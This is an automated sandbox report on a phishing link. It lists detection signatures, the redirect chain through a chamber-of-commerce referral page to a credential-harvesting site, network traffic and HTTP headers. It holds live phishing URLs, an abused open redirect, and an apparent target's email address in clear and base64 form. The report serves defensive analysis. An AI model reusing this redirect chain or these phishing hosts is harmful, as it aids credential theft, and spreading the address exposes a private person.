Windows Analysis Report
https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==

Overview

General Information

Sample URL: https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3
Analysis ID: 1431698
Infos:

Detection

HTMLPhisher
Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected HtmlPhish10
HTML page contains suspicious base64 encoded javascript
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid T&C link found

Classification

Phishing

barindex
Source: Yara match File source: 4.5.pages.csv, type: HTML
Source: Yara match File source: 4.6.pages.csv, type: HTML
Source: Yara match File source: 3.4.pages.csv, type: HTML
Source: https://efe.q39r.com/efe/#Xmaria.wojciechowski@co.monmouth.nj.us HTTP Parser: Base64 decoded: <script>
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ HTTP Parser: Number of links: 0
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ# HTTP Parser: Number of links: 0
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ# HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://efe.q39r.com/efe/#Xmaria.wojciechowski@co.monmouth.nj.us HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ HTTP Parser: Title: ttqWwrdlxa does not match URL
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ# HTTP Parser: Title: ttqWwrdlxa does not match URL
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ HTTP Parser: Invalid link: Terms of use
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ HTTP Parser: Invalid link: Privacy & cookies
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ# HTTP Parser: Invalid link: Terms of use
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ# HTTP Parser: Invalid link: Privacy & cookies
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ HTTP Parser: <input type="password" .../> found
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ# HTTP Parser: <input type="password" .../> found
Source: https://efe.q39r.com/efe/#Xmaria.wojciechowski@co.monmouth.nj.us HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/alyrn/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/alyrn/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal HTTP Parser: No favicon
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ HTTP Parser: No favicon
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ# HTTP Parser: No favicon
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ HTTP Parser: No <meta name="author".. found
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ# HTTP Parser: No <meta name="author".. found
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ HTTP Parser: No <meta name="copyright".. found
Source: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ# HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 104.123.200.136:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.123.200.136:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== HTTP/1.1Host: web.lehighvalleychamber.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== HTTP/1.1Host: sanemedia.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sanemedia.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /efe/ HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sanemedia.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /turnstile/v0/b/471dc2adc340/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/alyrn/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=879f1dd91a63b08b HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/alyrn/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/alyrn/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/efe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InB0WTVEQ05hK2pvVU1FSVFGdnRFaHc9PSIsInZhbHVlIjoiNHBacWh2QlRwVjRQd1MvNVlrcnhLalVVcFROQjRaaEJoNGlTRmZKd3NvVGxzZis1L1VIOUIwai9JN3RBYWNMalJndWxLTnBNTFBaalRWVDFWeWRLZjFnaWo5QkJ2L2hQSXY4djNIemVXdWtrRWozZUlxUFBQVDl2Wms2ajhwUzMiLCJtYWMiOiI1YmJjNzBjOGVlMzBiZmU5MGQ5NWI3NGY1NGFjYmQ4MDg5ZDQ0MWYxOWYwNmIyNmNjMjkyZmM4YzBiMDBhZmE5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlkveVp5RDBObWhUR2VHRkQ5eTE4eUE9PSIsInZhbHVlIjoiWUJjTm1lUWt5NmQ1OTAvMFgwMkZ4dUVGMW9zdkZVSzEvZEFYeCtMUGRsaE0yMW1POVN1WjZIQkxXdXBQbm9aRVhTSXNxTmpZdXM4VEN0bXZQSnFqL3ExTFhCU2pRRlJQSUhwWXFnRzZYWDRVOFBxOFZVTnZYK2h6ZnBjVkdnRUsiLCJtYWMiOiIxN2NhNjc5YzE2OTdmOTczMGU3ZGMwMTk3M2FjMmYxYTcwM2ZiYmMzOTZmNzE0NmIwNTY5ZWJmZWZkYTgzYzI1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/879f1dd91a63b08b/1714056325985/utgLeOjvjpAz4Rs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/alyrn/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/876680488:1714051748:QmiDdes-9Nz6iXnBJZCLK0I7EQT-6gDXt8XExuUwPvw/879f1dd91a63b08b/2bc5d6b33762ac4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/879f1dd91a63b08b/1714056325985/utgLeOjvjpAz4Rs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/879f1dd91a63b08b/1714056325990/1f93f76bb1b23b48ccddb7874975acb1314a2bc3e9f714b1688119b710b2df13/W8f6NEtdUi5mTUV HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/alyrn/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/876680488:1714051748:QmiDdes-9Nz6iXnBJZCLK0I7EQT-6gDXt8XExuUwPvw/879f1dd91a63b08b/2bc5d6b33762ac4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/876680488:1714051748:QmiDdes-9Nz6iXnBJZCLK0I7EQT-6gDXt8XExuUwPvw/879f1dd91a63b08b/2bc5d6b33762ac4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /efe/ HTTP/1.1Host: efe.q39r.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://efe.q39r.com/efe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ill6Vk4yM2d2SFgrZmtnb0grbkxnM3c9PSIsInZhbHVlIjoiWXhsVHZNTjJGQVMxekE5VWJPV2N1VTNjT3FxS2dodmlxRzdPYTAxRFBaOVVOSXFPV3hqVGFnM1NGUDlIUEFmOTZaNXhMd2tLdUhHSi9tVXovZU16UVBEMWRCYWVHMkQzV0NQRFlLZlJ6YzJ4dm0vS2wzU1E0TWowRG9sbStPemEiLCJtYWMiOiI3MWYwZTcwNzQ2ZDQ4NjUzYTIzY2VjYzVlYzliOWQ2NzQ0MGZmNTg5MGFiZDRkYzkzMDlhMzU4ZGUzYjViYmY3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVGZklxQytncTdnV1Y3SnRCQlJWVWc9PSIsInZhbHVlIjoiT3JkN2FXQ1dqcU14OCtmUWdSZzRuZW1MeXpwU0JDNjBzbTVMbDFBZS90Qis2ODZRWkN1bFFGT0JrTzFNbjhnUGllcmdTNzBZYXdXeVl4czJuTXhhWjZtMHRxeTdqclNRZHpHc0JISFFtZkQzWWt4Z2x0Wk85TFlsaVdxTHBQanEiLCJtYWMiOiI3NGU1Mzk0NjBkZTAwMzYxNWM1M2U1OGZiNmJkYTE4NTM4ZjkwZmUzZWJjZTgyMGY4NjZhNjUxMTVlNWNhNzkyIiwidGFnIjoiIn0%3D
